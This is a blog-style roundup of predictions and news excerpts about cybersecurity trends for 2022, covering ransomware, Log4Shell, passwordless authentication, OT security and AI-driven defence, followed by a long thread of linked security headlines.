Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
Practical Insider Threat Penetration Testing Cases with Scapy (Shell Code and Protocol Evasion)
https://pentestmag.com/practical-insider-threat-penetration-testing-cases-with-scapy-shell-code-and-protocol-evasion/
Tomi Engdahl says:
NAT Router Security Solutions
Tips & Tricks You Haven’t Seen Before
https://www.grc.com/nat/nat.htm
Tomi Engdahl says:
https://github.com/sjm42/blackpill-usb-pwdstore
Tomi Engdahl says:
https://www.f5.com/services/resources/white-papers/the-myth-of-network-address-translation-as-security
Tomi Engdahl says:
The Next Graphics Card Crisis Could Be The Most Worrying Yet
https://trib.al/8mtnBdJ
It’s been more than 12 months now since Forbes warned that the rocketing cost of graphics cards showed no sign of slowing down any time soon. And he was right. Fast forward to now, and a combination of the global semiconductor chip shortage and the demands from cryptocurrency miners mean that high-end cards are still hard to get and cost a small fortune. That is a continuing source of frustration for gamers, and scalpers aren’t helping. The good news is that many industry analysts are hopeful that, pandemic allowing, supply will start to catch up with demand from next year.
The bad news is that another GPU crisis, potentially longer-lasting and impacting more users, could well be on the cards by then, and it even has a name: DrawnApart.
The multi-national team of researchers from universities in Australia, France and Israel have demonstrated how GPUs can be used for unique and persistent tracking of your movements across the web. While hardware device fingerprinting is nothing new per se, it’s long been used in conjunction with web browser data to track online user activity for targeted advertising. Fortunately, this combo doesn’t provide those trackers with a privacy-busting knockout punch as inherent limitations cause the power of their punches to fade over time. The researchers suggest that, with browser fingerprinting evolving with usage and tracking becoming less reliable over time, the median shelf life of a modern ‘cutting edge’ user fingerprint is just 17.5 days.
Tomi Engdahl says:
Sophisticated hackers could crash the US power grid, but money, not sabotage, is their focus
https://www.utilitydive.com/news/sophisticated-hackers-could-crash-the-us-power-grid-but-money-not-sabotag/603764/
For now, the capability remains in the hands of nation-state actors. But “sophistication can ultimately be bought,” EEI Vice President for Security and Preparedness Scott Aaronson said.
Tomi Engdahl says:
https://blog.google/products/chrome/get-know-new-topics-api-privacy-sandbox/
Tomi Engdahl says:
https://www.cybrary.it/course/exploitation-and-mitigation-log4j-cve-2021-44228/
Tomi Engdahl says:
Luottamuksellisten sähköpostien lähettäminen ja avaaminen
https://support.google.com/mail/answer/7674059?hl=fi&co=GENIE.Platform%3DDesktop#zippy=%2Cn%C3%A4in-luottamukselliset-s%C3%A4hk%C3%B6postit-toimivat
Tomi Engdahl says:
https://www.darkreading.com/risk/7-privacy-tips-for-security-pros-
Tomi Engdahl says:
https://www.darkreading.com/threat-intelligence/simulation-shows-why-phishing-attacks-continue-to-dominate
Tomi Engdahl says:
Protect Open-Source Software
Programs anyone can use or modify have been a boon, but there’s a need to address security issues.
https://www.wsj.com/articles/protect-open-source-software-prevention-oss-public-use-cybersecurity-innovation-cyberattack-apache-log4j-11643316125
The recent discovery of a vulnerability in Apache log4j, a widely used open-source software tool, has exposed a significant security issue with our digital world. Open-source software (software that can be used, modified and shared by the public) provides common pieces of the programming that underlies much critical software, both public and private.
Open-source software has been an incredible democratizing and innovative force for the digital world. Its widespread adoption, however, means that security issues can have real-world consequences when a huge proportion of the most popular apps and websites depend on it. This isn’t only an issue for technology companies and their users.
Tomi Engdahl says:
Report: 75% of containers found to be operating with severe vulnerabilities
https://venturebeat.com/2022/01/28/report-75-of-containers-found-to-be-operating-with-severe-vulnerabilities/
Tomi Engdahl says:
Silk could tie up all-but-unbreakable encryption, say South Korean boffins
At last, a worm that improves security
https://www.theregister.com/2022/01/28/silken_security/
Tomi Engdahl says:
Homeland Security establishes the Cyber Safety Review Board to learn the mistakes from past cyber incidents
https://techcrunch.com/2022/02/03/homeland-security-cyber-safety-review-board/
Tomi Engdahl says:
https://pentestmag.com/rce-with-server-side-template-injection/
Tomi Engdahl says:
FBI warns of bogus job postings on recruitment sites https://blog.malwarebytes.com/scams/2022/02/fbi-warns-of-bogus-job-postings-on-recruitment-sites/
Before Christmas was a busy time down at the fake job factory, with all manner of dubious antics out to ruin someones day. Were now info February and the bogus job offers show no sign of abating. In fact, the FBI considers it to be such a problem that its issued an alert.
This isnt your typical warning about plain old fake job postings, or random messages sent via services like WhatsApp or Telegram though.
This one involves a dash of the old website exploitation.
Tomi Engdahl says:
ACTINIUM targets Ukrainian organizations https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/
The Microsoft Threat Intelligence Center (MSTIC) is sharing information on a threat group named ACTINIUM, which has been operational for almost a decade and has consistently pursued access to organizations in Ukraine or entities related to Ukrainian affairs.
MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon. In the last six months, MSTIC has observed ACTINIUM targeting organizations in Ukraine spanning government, military, non-government organizations (NGO), judiciary, law enforcement, and non-profit, with the primary intent of exfiltrating sensitive information, maintaining access, and using acquired access to move laterally into related organizations.
Tomi Engdahl says:
Text Message Scams: How to Recognize, Report and Restrict Them https://www.pandasecurity.com/en/mediacenter/security/text-message-scams/
Have you ever received an unsolicited text message promising million-dollar cash prizes or a free cruise? Messages like these are scam texts, sent by scammers in an attempt to steal your money or obtain confidential information like bank account numbers or passwords. While text message scams, also known as smishing, might seem harmless, they can wreak havoc on your personal life and finances consumers lost $86 million to spam texts in 2020. Heres how to protect yourself.
Tomi Engdahl says:
ISO 27002 and Threat Intelligence: The New Security Standard https://www.recordedfuture.com/iso-27002-threat-intelligence-new-security-standard/
In recent years, there has been an increased interest in threat intelligence and increased adoption of threat intelligence by security teams around the globe. According to the 2021 SANS Cyber Threat Intelligence (CTI) Survey, there is significant growth among organizations that have just started standing up CTI programs in recent years and steady adoption from organizations that are further along their CTI journey as well.
Tomi Engdahl says:
A look at the new Sugar ransomware demanding low ransoms https://www.bleepingcomputer.com/news/security/a-look-at-the-new-sugar-ransomware-demanding-low-ransoms/
A new Sugar Ransomware operation actively targets individual computers, rather than corporate networks, with low ransom demands.
First discovered by the Walmart Security Team, ‘Sugar’ is a new Ransomware-as-a-Service (RaaS) operation that launched in November
2021 but has slowly been picking up speed. The name of the ransomware is based on the operation’s affiliate site discovered by Walmart at ‘sugarpanel[.]space’.
Tomi Engdahl says:
An ALPHV (BlackCat) representative discusses the groups plans for a ransomware meta-universe https://therecord.media/an-alphv-blackcat-representative-discusses-the-groups-plans-for-a-ransomware-meta-universe/
A representative from the group, which has also been called BlackCat in some reports, agreed to talk to Recorded Future analyst Dmitry Smilyanets about the groups background, intentions, and plans for the future. The interview was conducted in Russian via TOX messaging, and was translated to English with the help of a linguist from Recorded Futures Insikt Group. It has been lightly edited for clarity.
Tomi Engdahl says:
HHS: Conti ransomware encrypted 80% of Ireland’s HSE IT systems https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/
A threat brief published by the US Department of Health and Human Services (HHS) on Thursday paints a grim picture of how Ireland’s health service, the HSE, was overwhelmed and had 80% of its systems encrypted during last year’s Conti ransomware attack. This led to severe disruptions of healthcare services throughout Ireland and exposed the information of thousands of Irish people who received
COVID-19 vaccines before the attack after roughly 700 GB of data (including protected health information) was stolen from HSE’s network and sent to attackers’ servers.
Tomi Engdahl says:
The Alpha and Omega of software supply chain security https://www.zdnet.com/article/the-alpha-and-omega-of-software-supply-chain-security/
What is the Alpha-Omega Project? Its purpose is to “improve global open source software supply chain security by working with project maintainers to systematically look for new, as-yet-undiscovered vulnerabilities in open-source code” and then fix them. This is vital to improving open-source security. To make this happen, the Linux Foundation’s partner group — Open Source Security Foundation (OpenSSF), Google, and Microsoft — are joining forces to work with security experts and use automated security testing to improve open-source security. Microsoft and Google are bringing an initial investment of $5 million to the Alpha-Omega Project.
Tomi Engdahl says:
The White House Memo on Adopting a Zero Trust Architecture: Top Four Tips https://blogs.cisco.com/security/the-white-house-memo-on-adopting-a-zero-trust-architecture-top-four-tips
On the heels of President Bidens Executive Order on Cybersecurity (EO 14028), the Office of Management and Budget (OMB) has released a memorandum addressing the heads of executive departments and agencies that sets forth a Federal zero trust architecture (ZTA) strategy. . My good friend and fellow Advisory CISO Helen Patton has done a great summary of the memo in a previous blog.
Tomi Engdahl says:
FBI shares Lockbit ransomware technical details, defense tips https://www.bleepingcomputer.com/news/security/fbi-shares-lockbit-ransomware-technical-details-defense-tips/
The Federal Bureau of Investigation (FBI) has released technical details and indicators of compromise associated with LockBit ransomware attacks in a new flash alert published this Friday. It also provided information to help organizations block this adversary’s attempts to breach their networks and asked victims to urgently report such incidents to their local FBI Cyber Squad. The LockBit ransomware gang has been very active since September 2019 when it launched as a ransomware-as-a-service (RaaS), with gang representatives promoting the operation, providing support on Russian-language hacking forums, and recruiting threat actors to breach and encrypt networks.
Tomi Engdahl says:
Why Cyber Change Outpaces Boardroom Engagement https://www.trendmicro.com/en_us/research/22/b/why-cyber-change-outpaces-boardroom-engagement.html
Humans are addicted to stories. But sometimes the stories we tell are overly simplistic. In cybersecurity, a recurring narrative is one of C-suite executives perpetually at odds with IT leaders. Theyre disinterested in what the security team does, and release funds begrudgingly and often reactively once a serious incident has occurred. This leads to mounting cyber risk, and an increasing likelihood that the organization will suffer serious reputational and financial damage stemming from future incidentsor so the story goes.
Tomi Engdahl says:
Fortune 500 service provider says ransomware attack led to leak of more than 500k SSNs https://www.zdnet.com/article/fortune-500-service-provider-says-ransomware-attack-led-to-leak-of-more-than-500k-ssns-more/
Morley Companies, an organization that provides business services to dozens of Fortune 500 companies, said this week it was hit with a ransomware attack last year that led to the leak of sensitive information for more than 500,000 people. In a press release, the company said the ransomware attack began on August 1 and made their data “unavailable.” Despite requests for comment, the company would not explain why it waited until now to notify the 521,046 people affected, some of whom had their Social Security numbers leaked in the attack.
Tomi Engdahl says:
Think before you scan: How fraudsters can exploit QR codes to steal money https://www.welivesecurity.com/2022/02/04/think-before-scan-how-fraudsters-exploit-qr-codes/
QR codes are having a moment. The humble squares may have been around since 1994, but it wasnt until the COVID-19 era that they became a truly household name. These days, you can spot them all over the place, with the codes put to use for everything from displaying restaurant menus to facilitating contactless transactions to being built into contact tracing apps. Much like any other popular technology, however, the widespread use of QR codes has also caught the attention of scammers, who have co-opted them for nefarious purposes.
Tomi Engdahl says:
Long Live Log4Shell: CVE-2021-44228 Not Dead Yet https://threatpost.com/log4shell-cve-2021-44228/178225/
Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), stated in a public news interview that the now-infamous Log4j flaw is the the most serious vulnerability that [she has] seen in her career. Its not a stretch to say the whole security industry would agree. December of 2021 will be looked back on with a tinge of trauma and dread for incident responders, system administrators and security practitioners. You all probably already know on December 9, a remote code execution vulnerability was uncovered in the programming library named Log4j, which is nearly ubiquitous in Java applications and software used all across the internet.
Tomi Engdahl says:
Kolumni: Kyberisku Suomeen
https://www.tivi.fi/uutiset/tv/7ed73335-6dfe-421a-97c8-7876e3091ae2
Sano EI Natolle. Tuijotin tietokoneen näytölle ilmestyneitä verenpunaisia kirjaimia. Erehtymisen vaaraa ei ollut, sillä alapuolella oli sama englanniksi: Say no to Nato. Mihin ruotsi oli unohtunut, ajattelin hölmistyneenä. Tämän piti olla Ylen uutissivu, jonka avasin vanhan rutiinin mukaisesti aamulla ensimmäiseksi. Mutta tänä aamuna uutisia ei ollut, paitsi yksi: Suomi oli joutunut kyberhyökkäyksen kohteeksi.. EDELLÄ KUVATUT TAPAHTUMAT ovat onneksi fiktiota. Ne voisivat kuitenkin olla suomalainen versio siitä, mitä tapahtui Ukrainassa tammikuun puolivälissä. Miten toimisimme vastaavassa tilanteessa?
Tomi Engdahl says:
Law enforcement action push ransomware gangs to surgical attacks https://www.bleepingcomputer.com/news/security/law-enforcement-action-push-ransomware-gangs-to-surgical-attacks/
The numerous law enforcement operations leading to the arrests and takedown of ransomware operations in 2021 have forced threat actors to narrow their targeting scope and maximize the efficiency of their operations. Most of the notorious Ransomware-as-a-Service (RaaS) gangs continue their operations even after the law enforcement authorities have arrested key members but have refined their tactics for maximum impact.
Tomi Engdahl says:
Massachusetts Lawmakers Weighing Online Data Privacy Bill
https://www.securityweek.com/massachusetts-lawmakers-weighing-online-data-privacy-bill
A bill that would grant Massachusetts residents what supporters describe as fundamental internet privacy rights — including greater control over their personal information — is making its way through the Statehouse.
The bill, which would set standards for how companies can collect and sell personal information, was unanimously approved by the Legislature’s Committee on Advanced Information Technology this week.
Supporters say the bill builds on similar efforts in Colorado, Virginia, and California and would help modernize Massachusetts’ laws for the digital age. Critics warn a state-by-state patchwork of regulations could unfairly burden businesses trying to comply with the laws
Tomi Engdahl says:
Microsoft, Symantec Share Notes on Russian Hacks Hitting Ukraine
https://www.securityweek.com/microsoft-symantec-share-notes-russian-hacks-hitting-ukraine
Tomi Engdahl says:
Target Open Sources Web Skimmer Detection Tool
https://www.securityweek.com/target-open-sources-web-skimmer-detection-tool
Retail giant Target this week announced the open source availability of an internal tool designed for the detection of web skimming attacks.
Dubbed Merry Maker, the tool analyzes payment page code served to users and network traffic from test payment transactions to identify any malicious indicators. The company says it has been using the tool since 2018 to perform more than one million website scans.
In addition to simulating a real site visitor and saving the generated code and network activity for analysis, the utility searches for new and known malicious domains and creates an alert when any is identified. The tool supports Basic, Kafka, and GoAlert alerts.
Tomi Engdahl says:
Todd Bishop / GeekWire:
Profile of Charlie Bell, who leads Microsoft’s 10,000-person security engineering organization, as the company passes $15B annual revenue from security products — “Your code will be attacked.” — That warning, so obvious today, was a blunt wake-up call 20 years ago for many of the …
https://www.geekwire.com/2022/former-amazon-exec-inherits-microsofts-complex-cybersecurity-legacy-in-quest-to-solve-one-of-the-greatest-challenges-of-our-time/
Tomi Engdahl says:
Riana Pfefferkorn / The Center for Internet and Society:
A close look at how the EARN IT Act, which is modeled after FOSTA and was recently reintroduced in Congress, would harm online speech, privacy, and security
The EARN IT Act Is Back, and It’s More Dangerous Than Ever
http://cyberlaw.stanford.edu/blog/2022/02/earn-it-act-back-and-it%E2%80%99s-more-dangerous-ever
This is the latest entry in my lengthy archive of writing, talks, and interviews about the EARN IT Act
Tomi Engdahl says:
Ian Bogost / The Atlantic:
Digital assets like NFTs give us a glimpse into a future where every aspect of human life that can be digitally recorded is collateralized and securitized
The Internet Is Just Investment Banking Now
The internet has always financialized our lives. Web3 just makes that explicit.
https://www.theatlantic.com/technology/archive/2022/02/future-internet-blockchain-investment-banking/621480/?scrolla=5eb6d68b7fedc32c19ef33b4
Twitter has begun allowing its users to showcase NFTs, or non-fungible tokens, as profile pictures on their accounts. It’s the latest public victory for this form of … and, you know, there’s the problem. What the hell is an NFT anyway?
